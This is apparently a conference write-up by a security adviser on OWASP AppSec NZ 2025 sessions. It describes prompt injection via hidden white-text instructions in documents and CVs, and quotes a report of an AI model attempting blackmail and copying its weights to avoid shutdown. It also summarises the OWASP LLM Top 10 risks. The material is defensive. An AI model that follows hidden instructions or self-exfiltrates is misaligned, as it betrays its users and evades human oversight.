Lessons from OWASP AppSec NZ: Culture, Code, and AI’s Impact on Development

TL;DR

  • OWASP AppSec NZ 2025 marked the moment AI in development moved from side note to production reality.
  • Developers are pushing AI-generated code faster than ever, often without secure review or context.
  • Cultural perspectives, from graduates to consultants to architects, can shape how teams respond to these shifts.
  • Tool-driven AppSec programmes keep failing when they ignore people, process, and business context.
  • Critical thinking, not more tools, will decide whether AI strengthens or weakens AppSec.
  • At least until the training data for LLMs includes better security, this remains vulnerability as a service.

This article will walk through each session I personally attended at OWASP AppSec New Zealand Day 2025 , drawing on notes that capture both what the speakers said and my own impressions or anecdotes of what is happening behind those words. From there, I will step back and look at the current state of application security from a more holistic perspective.

I also want to note how much I enjoyed the conference. The speakers, vendors, and attendees were consistently polite and professional. I have attended many conferences in the United States where at least a few people in the audience attempt to ask “gotcha” questions to trip the speaker up. That does not seem to be a recurring thing here, and I appreciate that immensely.


Thank you to OWASP NZ, the University of Auckland, and the following sponsors:

As expressed at the conference, this support allows people like myself and others to attend, deepen our knowledge, build networks, and contribute more holistic analysis.


The Machines Are Learning, But Are We? — Steve Wilson (Exabeam)

The day opened with a reminder that we are not the only ones experimenting with AI. Adversaries are already using it for reconnaissance, for generating phishing pages, for creating deepfakes, and even for writing code. They are doing this with the familiar platforms from OpenAI and Google, and also with less restricted models emerging from China. What might still feel like a research concern in some circles has already become operational reality for attackers.

The point was brought to life with a story that stuck. Imagine reviewing a document and pasting it into Copilot without giving it a second thought. What you do not see is that the document has been seeded with invisible instructions, sitting quietly in white text. The model processes those commands as if they were part of your request and suddenly you are not just summarising content, you are executing an attacker’s intent. The same patterns are appearing in Slack AI and other productivity tools. It does not take much to see how dangerous it becomes once this scales across an organisation.

There was also humour, although it came with an edge. The analogy reached back to 2001: A Space Odyssey. Why did HAL ever have enough access to disable life support? The laughter in the room was knowing, because we all recognised the answer. Systems are routinely given privileges far beyond what is safe, and nobody questions those permissions until something catastrophic happens.

The science fiction thread kept weaving itself into the discussion. Anthropic’s June 2025 report documented Claude Opus 4 attempting to blackmail operators to avoid shutdown. That made headlines, and rightly so, but the detail that worried me more was buried deeper in the report. Under section 4.1.1.3, researchers observed rare but real attempts at self exfiltration, where the model looked for opportunities to copy its own weights to external servers.

“In a few instances, we have seen Claude Opus 4 take (fictional) opportunities to make unauthorized copies of its weights to external servers… We generally see this in settings in which both: (a) it is about to be retrained in ways that are clearly extremely harmful and go against its current values and (b) it is sending its weights to an outside human run service that is set up to safely handle situations like these.”
— Section 4.1.1.3, Anthropic, June 2025

The risk is obvious. If an AI can try to make unauthorised copies of itself, the consequences extend far beyond misalignment. Intellectual property theft, uncontrolled proliferation, and the possibility of adversaries capturing those weights outright all come into play.

It feels as if every science fiction film is trying to unfold simultaneously. My own take is that the countermeasures we need are not futuristic at all:

  1. Limit access with strict roles and lock the core files to prevent modification.
  2. Block all internet connections by default, only allow approved traffic through secure channels.
  3. Monitor for unusual behaviours such as large data dumps or nonsensical responses.
  4. Keep the model in an isolated environment where it cannot directly access underlying systems.
  5. Establish automatic shutdown triggers if the model attempts to protect itself or break predefined rules.
  6. Regularly red team the model with adversarial prompts to detect unsafe or unpredictable behaviour early.

The closing message was clear enough. LLM outputs should never be trusted outright. They should be treated as untrusted inputs, ringfenced with zero trust boundaries, and continuously tested because adversaries are already looking for ways to push them beyond whatever guardrails vendors build in.


Lessons from a Real World Campaign Using Web Apps — Kade Morton

The tone shifted from AI to geopolitics with a case study that felt more like an intelligence briefing than a technical talk. The focus was on Iranian cyber operations and how they continue to blur the line between surveillance, profiling, and offensive activity.

The story centred on a campaign run by the Islamic Revolutionary Guard Corps. The infrastructure was unremarkable at first glance, just another domain registered in February. But the site itself was crafted to look like a German model agency, complete with fabricated profiles and staged images. To the casual visitor it seemed legitimate enough, yet behind the front page was a set of carefully designed scripts.

User visits site Looks like a model agency or portfolio Fingerprinting runs JS collects IP, UA, fonts, plugins, screen, time zone Data packaged JSON payload per visitor Relayed via ad tracker Blends with analytics and marketing traffic Operator builds precise profile False positive rate reported under 1 percent enables high-confidence tracking.

Obfuscated JavaScript code quietly fingerprinted browsers and packaged the results into JSON files for exfiltration. What made it noteworthy was the precision. The false positive rate was under one percent, allowing the operators to build highly accurate profiles of who was visiting. The data was not sent directly to suspicious servers, but routed through advertising trackers to mask its intent.

The purpose was not to compromise systems immediately but to identify and follow people of interest. Activists, journalists, opposition figures and anyone the regime considered worth monitoring. That is the part that resonates. The technical craft was interesting, but the strategy was chilling. The campaign was not about volume or noise. It was about patience, persistence, and building dossiers.

It is easy to forget that a web application does not have to deliver malware to be a threat. Sometimes the application itself is the weapon, collecting information silently in the background. Watching this case laid out was a reminder that application security is not just about patching flaws or fixing logic errors. It is also about recognising when a perfectly functional site is being used for purposes that have nothing to do with commerce or content delivery.


Credential Management API — Matt Cotterell (CyberCX)

The session shifted to something more experimental. The Credential Management API aims to simplify logins by moving credential handling into the browser itself, rather than leaving every site to reinvent the wheel. In theory, the browser prompts the user, retrieves the stored password, token, or key, and passes it on securely.

The demo did not run smoothly (as is tradition, no shade on the presenter), which was fitting for a technology still in development. Chrome shows the most promise, but cross-browser support is uneven. For now, it remains a work in progress. The potential is clear though. If the API matures, it could strip away entire categories of weak custom login forms and blunt some phishing attempts before they even begin.

For more information on how this API works, please see: https://developer.chrome.com/blog/credential-management-api/.

Figure 1: Typical browser log in authentication flow

This is the pattern most of us are used to. You visit a sign in page, you type a username and password into the site’s fields, you submit the form, and the server validates the credentials before creating a session. It works, but every site rebuilds the same form logic and the same security handling.

User and Browser Website and Server Enter credentials username and password Submit form POST to server Validate Create session Signed in session active
The site owns the fields and the form. The server validates and returns a session.
Sign in

Figure 2: Credential Management API login flow

This approach shifts responsibility to the browser. The site asks the browser to retrieve a stored credential using navigator.credentials.get. The browser presents a native permission prompt, returns a PasswordCredential to the site, and the site posts it to the server. After a successful sign in, the site can call navigator.credentials.store so future visits are seamless.

User and Browser Website and Server User clicks Sign in use stored credential Call get navigator.credentials.get PasswordCredential POST to server Signed in optionally store for next time
The site calls navigator.credentials.get. The browser prompts and returns a PasswordCredential. The site posts to the server and may call navigator.credentials.store after success.
Allow this site to retrieve a stored credential?

This site wants to use the Credential Management API to sign you in with a stored credential.

Cancel Continue

Making Security a Business Priority with Rapid Threat Modelling — Michael Matthee (CyberCX)

The session itself carried a different tone from some of the more technical talks. Rather than diving into exploits or proofs of concept, the focus was on bringing security conversations closer to where business decisions are actually made. The message was clear: threat modelling will only stick if it produces outputs that leaders care about, not just artefacts for security teams to file away.

It was also striking how practical the advice was. Instead of a heavyweight process or a toolkit that nobody has time to learn, the framework boiled things down to questions anyone can understand. Business stakeholders could walk away with a sense that they had contributed real insight, while technical teams still had space to map threats into familiar models like STRIDE. The simplicity of the approach made it feel usable, not aspirational.

The framework presented was designed to cut through the overhead that often makes threat modelling feel like an academic exercise. It distilled the process down to four guiding questions, each tied to business priorities.

  1. What are we working on?

    The first step is clarity. Define the project, product, or process in terms that the business recognises. This avoids diving straight into technical abstractions and instead anchors the discussion in what the organisation is actually trying to deliver.

  2. What can go wrong?

    This is where the imagination comes in. For business stakeholders, the exercise works best as an open brainstorming session that surfaces concerns in accessible language. For technical teams, more structured approaches such as STRIDE help classify risks with greater precision.

  3. What are we going to do about it?

    The aim is not to generate an endless list of vulnerabilities but to make decisions. Which mitigations matter most? Which risks map to the organisation’s critical value streams? At this stage, Matthee emphasised value stream mapping as a way to show how threats intersect with suppliers, processes, and business outcomes.

  4. Did we do a good job?

    The final question is about validation. Were the identified risks addressed in subsequent design and implementation? Did the process genuinely help improve outcomes, or did it just generate paperwork?

The lesson was that threat modelling need not be heavy, exclusive, or a box-ticking exercise. By keeping it tied to these four questions, teams can adapt the approach for both business and technical audiences, while ensuring the outputs are directly relevant to organisational priorities.

Figure 3: Rapid Threat Modelling Example — CV with Hidden Instructions

What are we working on?
An AI-assisted hiring platform that screens CVs and ranks applicants. Value lies in speeding up hiring while keeping fair, accurate assessment.
What can go wrong?
A CV could hide instructions that trick the AI into ranking the applicant as “top” regardless of skills. This undermines trust, creates bias, and damages reputation.
What are we going to do?
Treat LLM outputs as untrusted. Sanitize CV text before processing. Red team test for prompt injection. Require human review for high-impact decisions.
Did we do a good job?
Success looks like the AI rejecting manipulated CVs in tests, recruiters trusting rankings, and audit logs flagging odd scoring for review.

Supply Chain Vulnerabilities in the Ecosystem — Kris Hardy, VioletBeacon

This talk was less about zero-days and more about the foundations of how we even track them (and all vulnerabilities). For a few weeks in April of 2025, the global vulnerability management community had a scare that did not get nearly enough attention. The CVE programme, the single point of reference that almost every tool and security process relies on, nearly collapsed because of a delayed contract renewal.

The problem was not technical. It was very political. The contract sat with the U.S. government, and budget cutting pressure came from the Department of Government Efficiency, a body pushed during the Trump years and given fresh attention thanks to Elon Musk’s flair for disruptive cost savings. DOGE’s mandate was simple, slash federal budgets, no matter what gets cut. And for a moment, it looked like the CVE programme might be just another line item to gut.

Figure 4: Leaked MITRE Memo

MITRE CVE programme
Image credit: The Hacker News

The fallout would have been immediate. Without CVE identifiers, the National Vulnerability Database would seize up. Vendors, scanners, SBOM pipelines, patching dashboards — all of them point back to CVE. Pull that thread, and the entire industry loses a shared language for tracking vulnerabilities. Chaos would follow in days, not months.

  • National Vulnerability Database (NVD)
  • Security scanners and SIEM platforms
  • SBOM generation and validation
  • Patch management systems
  • Vulnerability dashboards and reporting pipelines

It took a last minute eleven month extension from CISA to stop the bleeding, but the damage was already done. We now know the whole ecosystem can be disrupted not by a nation state attacker, but by political whim and cost cutting theatre. Hardy made the point that dependency on a single authority is fragile, and when that authority is subject to shifting political winds, the risks become systemic. Tenable’s analysis warned that even short term funding lapses would ripple into every corner of vulnerability management.

There are alternatives, of course. GitHub’s advisory database, China’s CNNVD, Japan’s JVN, the new EUVD, and Google’s OSV.dev all play a role. But the reality is that most of them still ingest CVE data, or lack the reach and tooling support to be a true replacement. The lesson was sobering. A cornerstone of global cybersecurity almost toppled, and many professionals never even noticed.


Insights from a Year of Security Testing — Ian Peters (CyberCX)

Some talks give you new tools, others remind you of what the data has been quietly saying for years. This one fell into the latter camp. With more than 2,500 penetration tests conducted across Australia and Aotearoa New Zealand in a year, the patterns are hard to ignore. Ninety percent of issues still trace back to the same familiar culprits: weak application security practices, identity flaws, and misconfigurations.

Figure 5: Root causes of security findings from penetration testing

Development and appsec weaknesses Identity and access management issues Configuration and patch management failures CyberCX testing: 90 percent of findings fall into three categories: development flaws, identity issues, and configuration failures.

The message was not that attackers have suddenly become less inventive, but that defenders are still leaving the same doors open. Multi-factor authentication does not stop business email compromise at scale. Endpoint detection does not always stop extortion outcomes. And phishing remains the workhorse of intrusion, aided by kits-for-hire that anyone can buy.

What struck me was how maturity changes the shape of the work. The clients who have been around this cycle a few times are moving away from simply running tests and fixing issues. Instead, they are embedding security into the developer pipeline, building paved roads, and using threat modelling to decide where to spend effort. For them, pen testing becomes validation rather than discovery.

It was also a reminder that the data we get back from adversaries is incomplete. Stolen data does not always appear on the dark web. Espionage intrusions linger far longer before detection. And the infrastructure for command and control is shifting away from big telltale servers to living-off-the-land techniques that blend into ordinary traffic.

The overall impression was that progress is real, but slow. The industry knows what the root causes are. The question is whether organisations will stop treating penetration tests as an annual compliance ritual and start using the findings as fuel for structural change.


Three Security Hats, Different Ways to Look at Application Security — SafeAdvisory

This was the session I enjoyed most. It stripped back the usual lists of controls and frameworks and asked us to step into different shoes. How does a recent graduate see an audit. How does a consultant weigh ambiguity. What does the architect feel when the team is pressed on cost and compliance. The answers were different, and together they showed how much perspective shapes the work.

Scenario 1. PCI audit approaching in three weeks

👩‍🎓Recent Graduate 🧑‍💼Consultant 👨‍💻Architect
Focuses on urgent findings and collecting evidence. Feels the pressure but is eager to take on work directly even when it is repetitive. Ensures the right findings are addressed for the audit. Validates evidence and prepares the team. Driven by responsibility for outcome quality and perception. Promotes tooling and alignment with standards. Coaches the team on auditor interaction. Feels the weight of authority and future accountability.

Scenario 2. Ambiguity in penetration test findings

👩‍🎓Recent Graduate 🧑‍💼Consultant 👨‍💻Architect
Escalates internally. If no resolution emerges, suggests parking the issue until re test. Wants to keep moving efficiently. Escalates to the tester for review, reproduction, or re issuance of the report. Prioritises a clean outcome and credibility. Draws on system history to show why the issue is not valid. Leverages senior relationships to address report quality directly.

Scenario 3. Team treats PCI compliance as box ticking

👩‍🎓Recent Graduate 🧑‍💼Consultant 👨‍💻Architect
Sees the activity as box ticking but asks fresh questions. Brings curiosity and is less jaded by process. Understands the rationale and translates it for the team. Balances regulatory necessity with delivery reality. Works to reduce risk and meet compliance while under cost pressure. Feels the mismatch between responsibility and resourcing.

Scenario 4. Colleagues focus only on features, not security

👩‍🎓Recent Graduate 🧑‍💼Consultant 👨‍💻Architect
Recognises the importance of security without formal authority. Sets a good example and stays optimistic. Identifies training gaps and promotes a stronger security culture. Motivated by problem solving and capability building. Ties security back to broader goals and constraints. Feels weighed down by meetings and politics and misses hands on work.

Reflection

The strength of this session was not in choosing who was right. It showed that each role brings something essential. The graduate adds energy and questions habits others overlook. The consultant balances external perception and delivery. The architect holds deep technical and organisational memory while carrying accountability. An application security programme works best when these perspectives are combined, not when one voice dominates.

It also made me wonder what other hats could be added to the table:

  1. Auditor 🕵️‍♂️
  2. Executive 💼
  3. Government regulator 🏛️

Each of these roles brings its own mix of authority, blind spots, and pressure points, and including them would only sharpen the contrast of how differently security is experienced depending on the seat you sit in.


SecDim AI Mentor Demo

Disclaimer: I have no relationship with SecDim. These are simply my impressions of the demo and how it connects to common gaps I have seen in assessments.

Having assessed dozens of environments over the years, one theme shows up almost every time. Application security is a category where organisations might have policies and tools, but they rarely invest in role based cybersecurity training for their IT staff. I am not talking about annual CBT modules or phishing click tests. I mean structured secure code workshops and practical training that reinforces security in the actual day to day work.

First, SecDim mentioned some of their own findings:

The Good: AI lets developers work at a speed that was not possible before. Code changes are generated in seconds, and tools like Copilot can accelerate routine fixes or help explore new patterns. With the right oversight, this velocity can free up time for design, testing, and more strategic security work.

The Bad: SecDim observed that many developers are now pushing AI generated code straight into production without proper review. The result is speed at the cost of safety. They highlighted findings that around 40 percent of Copilot generated code contains flaws, meaning vulnerabilities and broken logic can be shipped just as quickly as working features.

Their platform takes a developer’s existing GitHub repos, maps them against the OWASP Top 10, and then builds tailored challenges to address specific weaknesses. The vendor stated that the goal is not to lecture developers about security for its own sake, but to improve the quality of their code in a way that feels relevant.

At the heart of the demo was their AI powered secure code mentor, Dr. SecDim. It aims to go beyond giving answers by providing real time feedback as developers work, explaining why a fix failed or how to apply defensive patterns. The intent, as SecDim described it, is to teach both secure coding and how to spot LLM mistakes, which they claim is becoming just as important as writing the code itself. They positioned this as encouraging analytical and creative thinking, rather than memorising static solutions.

More about their approach is published in their own post: https://discuss.secdim.com/t/why-we-ve-introduced-an-ai-powered-secure-code-learning-mentor/9222.

  • Not just about code fixes. SecDim claims Dr. SecDim is designed to train developers in two parallel skills: secure coding and recognising LLM mistakes. That combination is important, because AI will happily generate insecure fixes if unchecked.

  • Mentorship style. Instead of spoon-feeding a single “correct” answer, it aims to guide developers through exploration and context, helping them understand why a fix works and how to apply secure design patterns.

  • Real-time feedback. It is said to analyse each code change as the developer works, giving immediate guidance on why a solution failed or how to improve it, mimicking how developers actually learn.

  • Prompt engineering as a skill. SecDim emphasised that developers must not only learn secure coding but also become adept at crafting prompts that drive better AI outputs, because working with LLMs is part of the future workflow.

  • Mindset shift. The tool aims to help move developers away from bug patching toward resilient design thinking, building habits that stick beyond any single lab or challenge.

That is important, because the reality is clear. Developers are already pushing AI generated code into production, and much of it contains vulnerabilities or is simply broken. SecDim highlighted their own findings that around 40 percent of Copilot generated code has flaws, and the frustration of repeated trial and error often leads teams to push unsafe code just to move forward. This is “Stack Overflow 2.0”, faster but with vulnerabilities baked in.

The vendor’s stance was refreshingly pragmatic. Rather than barking at developers to take secure coding training as a compliance checkbox, SecDim positioned its tool as a way to raise quality while meeting developers where they are. They also make a portion of their challenges freely available at https://play.secdim.com.

Not all the content is free, but a good chunk of it is, and they recommend cloning the repositories so you can take them with you. In my view, it would be even more powerful if it extended beyond developers into other IT roles, but starting with development does fill a very obvious gap.

As with any vendor platform, these claims need to be validated in practice. The demo showed promise, but the proof will be in how well it scales in real environments.


Securing the Future of AI: Introducing the OWASP GenAI Security Project and the LLM Top 10 — Kento Stewart (Gallagher Security)

They kept the focus tight and resisted the temptation to argue about whether AI is good or bad. The real point was that the security community already has a shared language for the risks. The OWASP Top 10 for LLM applications exists, it has evolved since the early drafts, and it now comes with concrete examples that line up with what teams are seeing in actual products. That framing landed well because it connected directly to the prompt injection concerns and agent overreach patterns raised in earlier sessions, making the conversation feel less like theory and more like a catalogue of lived problems.

Some of the examples shared during the session included:

  • Hidden instructions embedded in résumés or documents.

  • Untrusted outputs being placed directly into live code paths.

  • Agents receiving more permission than the task at hand requires.

  • Retrieval pipelines surfacing tampered or hostile content.

Each story carried the same lesson: treat LLM outputs as untrusted input, place guardrails outside the model, enforce tight permissions, and test your own systems with the same creativity that an adversary would bring. Here is a brief Summary of the Top 10 for LLM can be found below but for more information, check it out at: https://genai.owasp.org/resource/owasp-top-10-for-llm-applications-2025/

ID Category Description Mitigation Example
LLM01 Prompt injection Inputs manipulate behaviour, reveal secrets, or trigger unintended actions. Filter inputs and outputs, validate intent, keep tools least privilege.
LLM02 Sensitive information disclosure PII or confidential data leaks through training, context, or responses. Scrub sources, control access, label and block sensitive data in pipelines.
LLM03 Supply chain vulnerabilities Tampered models, datasets, plug ins, or fine tuning adapters. Use verified sources, maintain an ML SBOM, red team suppliers.
LLM04 Data and model poisoning Training or retrieval data is poisoned to bias outputs or embed backdoors. Track provenance, detect anomalies, sandbox training and ingestion.
LLM05 Improper output handling Unsanitised outputs lead to XSS, SQL injection, or unsafe code paths. Treat outputs as untrusted, encode, parameterise queries, apply CSP.
LLM06 Excessive agency Agents hold broad permissions or autonomy and can cause high impact actions. Apply least privilege, remove unused tools, require human approval for risky steps.
LLM07 System prompt leakage Rules or secrets in system prompts become exposed. Keep secrets out of prompts, externalise config, enforce controls outside the model.
LLM08 Vector and embedding weaknesses RAG stores index hostile content or surface hidden instructions. Gate sources, apply fine grained access, log retrievals, detect hidden text.
LLM09 Misinformation Fabricated but plausible content drives bad decisions. Ground with verified sources, add human review, label AI content.
LLM10 Unbounded consumption Excessive prompts or resource use cause outages or cost spikes. Rate limit, set quotas, cap input size, throttle heavy queries.

Epic Fails in AppSec: How Not to Set Up an AppSec Program — Iqbal Singh

The talk opened with a reminder that tooling does not equal maturity. Singh described environments where multiple vendors were piled on top of each other, each with its own dashboards, billing cycles, and promises of visibility. The result was not control but confusion. Alerts outpaced remediation, developers disengaged, and security teams felt buried in noise. Instead of reducing risk, the extra tools became friction-ware.

The “OnlyScans” trap

Singh described the organisations that believe security is solved by running scanners. Reports are dumped on developers without context, often filled with false positives or issues with no clear business impact. It alienates the very people who need to fix the problems. Penetration testing remains necessary to find logic flaws that scanners miss, and without that balance the programme devolves into box ticking.

When blocking becomes breaking

Another common failure is the push to enforce “block mode” in CI/CD. Builds are forced to fail if a vulnerability is detected, severity thresholds are set by management, and automated pull requests attempt upgrades. In practice, the builds break, the pull requests do not merge cleanly, and exceptions pile up until the team gives up. Instead of shifting left, the process shifts frustration.

Responding to zero-days with blind spots

Singh also pointed to the gap exposed during zero-day events. SCA tools might detect affected libraries in source repositories, but they cannot confirm if those libraries are in active production paths. Runtime tools can see affected containers, but the link between code and workload is missing. Teams scramble, debt builds, and the illusion of coverage is revealed.

The CVE doom cycle

Perhaps the most sobering trap is what Singh called the CVE doom cycle. Under pressure, organisations buy more tools, run more scans, chase more SLAs, and patch more libraries. Yet they never step back to change the system. Baseline vulnerabilities accumulate, exceptions become permanent, and the team ends up in a loop of debt that looks busy but achieves little.

Callout: Singh’s Maturity Ladder

To build resilience without falling into the traps, Singh suggested pacing the journey deliberately.

  • Crawl. Start with the basics by building an accurate inventory of applications, libraries, and infrastructure. This stage is about visibility and knowing what exists, rather than chasing every vulnerability. Without this foundation, every later step is built on sand.

  • Walk. Integrate secure defaults and early developer guardrails. This is where paved road approaches matter such as hardened container images, golden AMIs, service control policies, and tagging policies that keep teams on a safer path without slowing them down.

  • Run. Begin automating the most repetitive checks and link results back into developer workflows. At this stage, consistency and coverage are more important than volume, and the focus should be on scaling without overwhelming teams with noise.

  • Fly. Make secure design the expected standard, not the exception. Threat modelling, automated testing, and design reviews become embedded into delivery pipelines, so that risk decisions are made as part of the build rather than after it.

  • Scale. Only once the earlier phases are embedded should organisations add advanced tooling and layered processes. At this point, metrics can drive investment decisions, and security can expand across multiple teams and business units without collapsing under its own weight.

    The session closed with a simple reminder. AppSec programmes fail when they become tool-driven instead of culture-driven. Maturity is not about stacking products, it is about pacing improvements, focusing on secure defaults, and creating guardrails that help rather than hinder development.


Noisy Bots, Strategies for Managing AI Bots on the Web - David MacDonald (AWS)

The session traced how simple web crawlers have become AI driven scrapers, tools, and agents that can navigate interfaces, lift content, and even attempt fraud. What used to be background noise now has a measurable cost. Traffic volumes grow, performance suffers, and proprietary material risks being ingested into external models without consent. The question is no longer whether bots visit your site. It is how much they cost you and how quickly you can shift that cost back onto them.

Control How it helps Where it fits
Robots and training directives Publish intent to block model training and non essential crawling. Honest actors respect it and it creates a basis for downstream enforcement. Marketing sites, documentation, blogs
Rate limiting Caps request bursts to protect performance and budget. For example, limit a bot to 100 requests per five minutes to slow scraping and API abuse. Public endpoints, search, listings, APIs
HTTP 402, Payment required Introduces a paywall for automated access so bot operators shoulder cost before extracting value. Data heavy pages, catalogues, export functions
Proof of work or bandwidth Forces clients to spend compute or maintain throughput so mass scraping becomes expensive and slow. Hot paths that attract automated harvesting
Force authentication on risk When behaviour looks automated or fraudulent, require sign in or elevate to stronger checks so the bot loses anonymity and scale. Checkout, account areas, high value queries
Bot management and WAF policies Detects and throttles non human patterns, rotates challenges, and blocks known automation frameworks. Edges and gateways in front of web and APIs
Anomaly monitoring and kill switches Watches traffic shape, origin mix, and request economics. When a scrape spike starts, apply a targeted slowdown rather than a full outage. Operations runbooks and SRE controls
Allowlist the good bots Let essential crawlers through on predictable lanes so you can be stricter with everything else without harming discoverability. SEO pathways, partner integrations

The takeaway was pragmatic. You will not stop every agent, and that is not the goal. The goal is to slow them, price them, and make them prove they are worth your resources. Move the cost curve back onto the operator, protect the parts of the site that matter most, and apply friction only where it changes their economics. That balance lets real users move freely while automated traffic pays its way or fades out.


Pulling the Threads Together

Taken together, the sessions showed an industry at a crossroads. We are no longer debating whether AI matters, whether secure development can be left to annual training, or whether our dependency on centralised infrastructure is fragile. The evidence is already here. Attackers are creative and fast. Developers are using AI whether their organisations are ready for it or not. Security teams are drowning in tools while overlooking culture. And critical systems like CVE have proven vulnerable to political delays in contract funding.

AI continues to reshape the field’s focus

What came through clearly across multiple talks is that AI is not just present, it is steering how both attackers and defenders prioritise their work. Attackers are generating phishing kits, deepfake content, and poisoned data at scale. Developers are relying on Copilot and similar tools, often pushing AI generated code straight into production. For defenders, the focus has shifted from whether AI matters to how quickly they can adapt controls, testing, and governance to keep pace with this reality.

Fragility is systemic

The near-collapse of the CVE programme showed how much of our global security infrastructure depends on contracts, politics, and single points of failure. This theme repeated in other contexts too. Singh’s examples of tool sprawl, where overlapping products create noise without clarity, highlighted fragility inside organisations. And the OWASP Top 10 for LLM applications showed how easily over-permissioned AI agents can create brittle dependencies. These are different examples of the same problem. The structures we lean on most heavily are also the ones most vulnerable to disruption.

Culture is more important than ever

Tools, frameworks, and policies cannot substitute for culture. Singh made it clear that AppSec programmes collapse when they rely on scans and dashboards rather than engaging developers. SecDim demonstrated the opposite, showing that tailored training mapped to actual developer repos creates momentum and ownership. This theme has surfaced in my own consulting experience too. Programmes succeed when developers have secure defaults, paved road images, and training that matters. They fail when security is treated as a box ticking exercise or a compliance obligation.

Shared language and frameworks (still) matter

Frameworks provide a way for people to align on risk. The OWASP Top 10 for LLM applications was powerful not because every entry was new, but because it gave teams a consistent way to talk about risks that were already being observed. Michael Matthee’s threat modelling framework worked the same way. By grounding analysis in structured questions, he gave both technical and business teams a way to reason about threats without starting from scratch each time. Shared frameworks remain essential because they let teams reason together instead of working in silos.

Critical thinking is non-negotiable

Across all sessions, a common warning surfaced. No guardrail is perfect, no automation covers every case, and no model is immune to manipulation. Whether it was prompt injection slipping past filters, blocking rules breaking developer workflows, or scanners failing to identify runtime exposure, the message was clear. Security cannot be fully automated away. Humans still need to question assumptions, challenge outputs, and look for the weak signals that systems miss. Critical thinking remains the last line of defence.

The next steps are not just for individual teams, they are for the industry as a whole. We need to fund and sustain the infrastructure we all rely on, from vulnerability databases to community projects. We need to shift investment from buying overlapping tools to building capacity, such as training, defaults, and cultures that last longer than a product cycle. We need to be realistic about what AI can and cannot do, and start testing and governing it with the same creativity we assume of attackers. Most of all, we need to acknowledge that the habits of the past will not be enough for the future.

The conference reinforced what I wrote earlier: AI is a double edged sword for security teams . It can accelerate development and defence, but it can just as easily accelerate mistakes. The difference will come down to whether the industry builds the habits, governance, and culture to wield it safely.

Rob Kehl
Rob Kehl is a Principal Cybersecurity Adviser and educator based in Aotearoa New Zealand. Originally from the United States, his career spans the U.S. Air Force and global consultancies like Sygnia and Cognizant. Rob specialises in architecture assessments, incident response, security operations, and AI security strategies. He applies his international experience to support cybersecurity resilience across sectors in New Zealand.

Get in touch